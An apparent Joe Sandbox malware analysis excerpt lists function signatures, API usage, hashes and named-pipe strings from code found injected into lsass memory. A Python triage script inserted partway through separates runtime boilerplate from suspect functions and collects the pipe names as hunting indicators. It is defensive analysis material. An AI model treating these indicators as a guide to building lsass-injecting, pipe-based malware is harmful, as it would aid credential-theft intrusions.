                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: d33db17a6a3834e504e60fa23096d5bdff287254edc6079e3c59764f330a6822
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 8C113732614B40C2F710CB21F49C75E7760F389BD4F954216EBA946AA9CF3DC148CB44
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 22b18ffbf591b9dc89f632c02f4c28f659f76ce7d48a6708a250f2a210a7424c
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 9F81D530600741CAFB64AB69A8CD39D26D0AB86780F07612BDF09477D7DBB9CA4E8710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 90553422afb251b2333bb3ab516386814491dc1bf468d3212e086abda9a642d1
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 6981E4716103C1C6FA54EB6598CD3AD6290AB85784F574117ABE8473D7EF38CA6E8700
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B31
                                                          • GetLastError.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000202C0AE9C6B,?,?,?,00000202C0AE945C,?,?,?,?,00000202C0AE8F65), ref: 00000202C0AE9BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 2f7bb17091c3ad669aac45023b8a36a5db2972c06d5c6d1236e1bc469af265ea
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 0A318421212B80D5FE11DB16A89C79D2394BB49BA0F5B0627DFAD4B792EF38C46C8314
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 4684a3b6f03071b9fbdecb27535ffbe65efa07643c59d5347bdcf71fed77be26
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 0E116022324B40C6F750CB62E89C71D66A0F788BE9F454217EB5E87B95CF39C9488744
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 4059655588c06262bb9e9a5817a7e9d20f6ac25274a879b1308bfe414715c134
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 6FD19776214B88C6EA70DB0AE49835E77A4F388B88F110517EBDD477AACF39C955CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: ac81ffba270cbcd8ca7ff8d8b8890d8c165ed8bf11482b1277a3e3b317920732
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: AE51AA71201B85D5FB19EB24E8DC69C23A1FB44B48F860917A7AD067A7EF74DA2CC350
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: cb7b1bf515307d281e61f84502089fd4659e2d19a194bc2e74b976beb2e9b607
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 1D318D22705B91E2FA14DF26A98C72EA3A0BB44B84F0A40238F9807B56EF34D4798700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 2107b0081469023aaed2b856a6d9ca0864ac4a40cee91d820bb639892fa8c1c3
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: CB1186213103D0D2FA14B73168DD3AE1251AB88794F574627EBB65B3C7DE38D82A4300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: cef2ec367b5bf5f88403ef2d8067b784126752e9b6ab15f0aec9f8f7e49451a6
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 77010522705B8086FA14DB22A89C75962A1FB88FC0F8A41369F9943755DE39C9898780
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 4fe45aef8abda1118a3182d0fe23ad37238832c29f6318056cc31bcfd59596a4
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: F901DB66611740C6FB24DB21E88CB1D62A0BB44B45F160427DB9E067A6EF3EC85C8740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: d8837c5ce690130c2a4c636cf2b35a019e001dd55ce572a27a65843f68b2c2f6
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 53F08C32314784D2FB208B25E9DC35D6360F744BC8F8640238B894695ADE6DC69CCB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: b6175183439679ade4b9a440113b8254938e64d81a702bb967794fe07d2f2327
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 70F082A6704B80D1FA14DB27B9AC11D6661BB48FC0F468133EF5A0BB1ACF2CC4598700
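The following triage script is an added example; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses the per-function Similarity blocks in the form shown above (the embedded sample text is copied from three of them), separates functions whose API ID or String ID match MSVC CRT boilerplate (api-ms- api-set resolution, CONOUT$ console initialisation, __scrt_ startup, CorExitProcess via mscoree.dll) from the functions worth reversing in the lsass dump, and collects the named-pipe string fragments as hunting indicators. The CRT marker table and the treatment of '$' as the separator Joe Sandbox uses when joining several API names or strings into one ID are assumptions.

```python
"""Triage of Joe Sandbox per-function 'Similarity' blocks (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: three blocks copied from the report in its own layout.
# Raw string so the backslashes in the pipe string survive verbatim.
SAMPLE = r"""
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$nya-childproc
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction Fuzzy Hash: 8C113732614B40C2F710CB21F49C75E7760F389BD4F954216EBA946AA9CF3DC148CB44
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
• Instruction Fuzzy Hash: 0A318421212B80D5FE11DB16A89C79D2394BB49BA0F5B0627DFAD4B792EF38C46C8314
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 9F81D530600741CAFB64AB69A8CD39D26D0AB86780F07612BDF09477D7DBB9CA4E8710
"""

# Assumption (heuristic, not from the report): substrings that mark MSVC
# CRT/VCRuntime boilerplate rather than the payload's own logic.
CRT_MARKERS = {
    "api-ms-": "CRT api-set resolver",
    "CONOUT$": "CRT console init",
    "CorExitProcess": "CRT exit path via mscoree.dll",
    "__scrt_": "CRT startup",
}
PIPE_PREFIX = "\\\\.\\pipe\\"                      # literal \\.\pipe\
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(\w+)\.jbxd")
FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")


@dataclass
class FuncRecord:
    process: str            # process the code was dumped from (snapshot name)
    api_id: str
    string_id: str
    opcode_id: str
    fuzzy_hash: str
    crt_reason: str = ""    # non-empty => treated as CRT noise
    pipe_fragments: list = field(default_factory=list)

    def strings(self):
        # Assumption: Joe Sandbox joins a function's strings with '$'.
        return [s for s in self.string_id.split("$") if s]


def _build(fields):
    m = SNAPSHOT_RE.search(fields.get("Snapshot File", ""))
    rec = FuncRecord(process=m.group(4) if m else "?",
                     api_id=fields.get("API ID", ""),
                     string_id=fields.get("String ID", ""),
                     opcode_id=fields.get("Opcode ID", ""),
                     fuzzy_hash=fields.get("Instruction Fuzzy Hash", ""))
    for marker, reason in CRT_MARKERS.items():
        if marker in rec.api_id or marker in rec.string_id:
            rec.crt_reason = reason
            break
    if PIPE_PREFIX in rec.string_id:
        # The pipe name is assembled at runtime (another function carries only
        # the prefix plus a PathCombine call), so keep the fragments as they
        # are instead of guessing the final name.
        rec.pipe_fragments = rec.strings()
    return rec


def parse_blocks(text):
    """Parse '• Key: Value' lines; 'Instruction Fuzzy Hash' closes a block."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        cur[key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(_build(cur))
            cur = {}
    return records


def triage(records):
    """Split records into (worth reversing, CRT noise)."""
    payload = [r for r in records if not r.crt_reason]
    noise = [r for r in records if r.crt_reason]
    return payload, noise


def pipe_iocs(records):
    """Named-pipe string fragments across all functions, for hunting."""
    return {frag for r in records for frag in r.pipe_fragments}


if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    payload, noise = triage(recs)
    for r in payload:
        print(f"[{r.process}] {r.opcode_id[:16]} apis={r.api_id} strings={r.strings()}")
    for r in noise:
        print(f"[{r.process}] {r.opcode_id[:16]} skipped: {r.crt_reason}")
    print("pipe IOC fragments:", sorted(pipe_iocs(recs)))
```

Run as-is to see the partition of the three sample blocks; pass the text of a whole report to parse_blocks to triage every function. The pipe name is deliberately not reassembled: the CombinePath function above carries only the \\.\pipe\ prefix, so the complete name exists only at runtime and should be taken from a live system or a fuller memory dump rather than guessed from the fragments.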
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
